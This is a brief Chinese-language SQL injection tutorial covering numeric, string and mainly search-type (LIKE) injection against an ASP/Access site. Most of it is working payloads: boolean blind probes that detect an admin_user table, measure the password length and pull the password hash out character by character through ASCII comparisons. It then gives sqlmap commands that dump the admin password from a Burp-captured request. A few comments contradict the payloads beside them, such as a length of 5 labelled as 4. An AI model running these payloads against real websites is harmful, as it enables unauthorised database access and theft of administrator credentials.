参数型注入有:数字型和字符型大家都懂,还有一种搜索型注入。
数字型:id=1 and 1=1
字符型:id=1' and 1=1 # 或者用 --
搜索型注入:
like、*、%%
select * from news where id="'%like $id%"
http://127.0.0.1/search.asp?Field=Title&BigClassName=&SmallClassName=&keyword=123&Submit=%CB%D1%CB%F7
参数:keyword=123
'%%'and 1=2 and '%'='%'
2% and 1=1 and '%'=' 返回和单独输入2是一样的页面
2%’ and 1=2 and '%'=' 返回不同
2%’ and(select count(*)from mssysaccessobject)>0 and '%'=' //返回正常,access数据库
2%’ and(select count(*)from admin_user)>0 and '%'=' //返回正常,存在admin_user表
2%’ and(select count(username)from admin_user)>0 and '%'=' //返回正常,存在username字段
2%’ and(select count(password)from admin_user)>0 and '%'=' //返回正常,存在password字段
2%’ and(select top 1 len(admin)from admin_user)>4 and '%'=' //返回正常,username长度大于4
2%’ and(select top 1 len(username)from admin_user)=5 and '%'='/ /返回正常,username长度等于4
2%’ and(select top 1 len(password)from admin_user)=16 and '%'=' //返回错误,说明密码不是16位,可能有MD5加密,可能32位加密。
2010%’ and(select top 1 len(password)from admin_user)=32 and '%'=' //返回正常,32位
2%’ and(select top 1 asc(mid(password,1,1))from admin_user)=55 and '%'='
如果是:2010%’ and(select top 1 asc(mid(password,1,1))from admin_user)=48 and '%'='
//返回错误,因为password字段第一个字母ASCII编码不是48,而是55,所以返回结果不同。
2%’ and(select top 1 asc(mid(password,2,1))from admin_user)=101 and '%'='
2%’ and(select top 1 asc(mid(password,3,1))from admin_user)=101 and '%'='
2%’ and(select top 1 asc(mid(password,4,1))from admin_user)=102 and '%'='
2%’ and(select top 1 asc(mid(password,5,1))from admin_user)=54 and '%'='
工具:burpsuite、sqlmap。
sqlmap:
1、先使用burp抓包,保存到1.txt
sqlmap -r 1.txt --tables 猜表名
sqlmap -r 1.txt --columns -T "admin" 猜列名
sqlmap -r 1.txt --C "admin.password" -T "massage" --dump -v 2 列内容
伪静态:xxxxx.html -> xxx_xx.asp
xxxx.html -> xxxx
xxx_xx.html -> xxx.asp?id=xx